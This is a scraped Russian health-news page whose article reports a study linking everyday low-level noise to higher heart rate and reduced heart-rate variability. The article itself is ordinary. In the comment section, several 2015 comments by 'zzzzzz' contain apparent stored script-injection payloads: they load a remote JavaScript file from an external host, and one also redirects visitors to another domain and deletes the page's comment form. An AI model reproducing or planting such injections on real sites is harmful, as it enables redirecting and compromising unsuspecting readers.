Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Обычный шум может вызвать...  >>  Обычный шум может вызвать остановку сердца! Как избежать этого?
 
Обратная связь
 

Обычный шум может вызвать остановку сердца! Как избежать этого?

Размер шрифта
13 июня 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Даже минимальный шум, наполняющий нашу жизнь (телефонные звонки, человеческий голос и т.д.), определенным образом влияет на функцию сердца. К такому выводу пришли западные ученые.

В исследовании приняли участие 110 взрослых добровольцев, которых снабдили системами суточного мониторинга сердечной функции. Оказалось, что повышенная звуковая нагрузка увеличивает частоту сердечных сокращений (ЧСС), даже если звуки были сами по себе негромкими (менее 65 децибел, что соответствует обычному разговору или смеху).

Другой отрицательный эффект касается естественной вариативности сердечного ритма. Примером последней является повышение ЧСС на вдохе, что наблюдается в норме в расслабленном состоянии. При повышенной звуковой нагрузке этот феномен отчасти теряется, что, как считается, повышает риск смерти от инфаркта миокарда.

Значит ли это, что мы должны постоянно носить беруши, чтобы защитить наше сердце? «Не совсем так», – считают ученые.

«Влияние повседневного шума на состояние сердца одного конкретного человека очень незначительно», – говорит Шарлотта Эрикссон, сторонний эксперт из Швеции. «Но поскольку все мы без исключения подвержены звуковому воздействию, совокупность всех этих незначительных влияний в итоге может играть значительную роль на уровне популяции».

Отрицательное воздействие громких звуков известно очень давно, но с бытовым шумом все не так просто. «Весьма проблематично оценить влияние бытового шума на здоровье, как минимум потому, что восприимчивость к подобным раздражителям сугубо индивидуальна», – утверждает Уэнки Гэн, научный сотрудник одного из исследовательских институтов Нью-Йорка.

Результаты данного исследования позволяют сделать определенные выводы. По всей видимости, низкий уровень шума активирует парасимпатическую нервную систему, которая снижает ЧСС и расслабляет сосуды. Высокая же степень звукового воздействия стимулирует симпатическую нервную систему, которая обладает противоположными эффектами.

Окончательные выводы делать рано

Ценность этой работы заключается в том, что она позволяет приоткрыть завесу тайны над механизмами, которые лежат в основе влияния шума на здоровье сердца.

«Мы не преследовали цель сообщить людям, какой уровень шума вредит их сердцу, а какой – безопасен», – говорит Гэн. «Мы лишь сделали первый шаг навстречу пониманию того, каким образом звуковое воздействие может повлиять на сердечно-сосудистую систему и какое значение это в конечном итоге может иметь для пациентов с хроническими заболеваниями. Но, безусловно, необходимо дальнейшее изучение этой проблемы, чтобы оценить отсроченные последствия, потому как в данной работе это не освещалось».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

25 июня 2013 в 13:12

Цитировать   |   Пожаловаться

К постоянному шуму от автомагистралей, близлежащих ночных клубов и магазинов,  бытовой техники мы привыкли настолько, что почти не обращаем внимания

Но организм – обращает. Это и усталость, и нервозность, и бессонница. Шум вызывает и более серьезные психосоматические болезни: гипертонию, инфаркты, инсульты.

2 - zzzzzz

30 июня 2015 в 19:14

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:13

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Ожирение мам сокращает жизнь ребенка   Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?   Три ошибки в аптеке   Всемирная неделя первичного иммунодефицита начинается в Москве!  
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Грозит ли вам инфаркт миокарда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.